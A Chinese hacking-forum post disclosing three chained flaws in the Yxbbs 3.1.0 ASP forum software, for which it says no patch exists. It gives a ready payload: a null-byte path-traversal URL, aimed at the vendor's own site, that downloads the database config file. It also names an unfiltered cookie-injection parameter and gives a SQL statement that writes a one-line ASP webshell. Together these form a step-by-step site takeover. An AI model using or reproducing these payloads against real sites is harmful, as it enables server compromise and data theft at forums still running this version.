看帖不回的,哥一会给你们扣分!

漏洞发现者:
xxbing
www.t00ls.net

影响版本:
Ver 3.1.0
(以前的版本未测试)

漏洞描述:
官方网站:http://www.yimxu.com/
Yxbbs 是由Y网所开发的一套开源免费的社区论坛系统程序,采用asp+Access(SQL)的技术.
速度方面:采用目前较为流行的缓存技术,这样大大加速了论坛的访问速度
功能方面:虽然功能不能和动网相比,但是我们以实际为基础,功能绝对够一般论坛的需求
适用方面:本论坛使用操作简单方便,更适合那些没有多少经验的论坛新人使用
体积方面:本论坛大小只有387K,而且包括了2个插件,更适合小空间,上传时间也会大大减少
分为免费版和注册版。
ver 3.1.0存在严重的安全问题!

测试方法:
1:任意文件下载:官方测试

http://www.yimxu.com/bbs/ViewFile.Asp?filename=..\..\inc\conn.asp.%00.jpg

2:cookie注射点。根目录下的文件Rss.Asp的BoardID变量未采取过滤措施,由于有全站防注射文件保护(默认对Request.cookies不做防护),导致可以通过cookies注射。

3:后台可以执行任意sql语句。需要iis6环境。

SELECT '<%execute request("a")%>' into [YX_admin] in 'D:\web路径\a.Asp;a.xls' 'excel 8.0;' from YX_admin

执行这个语句,即可得到一个webshell.

得到绝对路径的方法:利用任意文件下载漏洞。随便下载一个论坛文件,保存的时候,会让你保存类似这样的文件。

D__hosting_wwwroot_index.asp d:\hosting\wwwroot\即为绝对路径。。

所以说,这3个漏洞,是环环相扣的。
数据库里面保存了后台目录名,如果默认后台目录admin改了,可以尝试用注射漏洞跑一下。

产商补丁:
尚无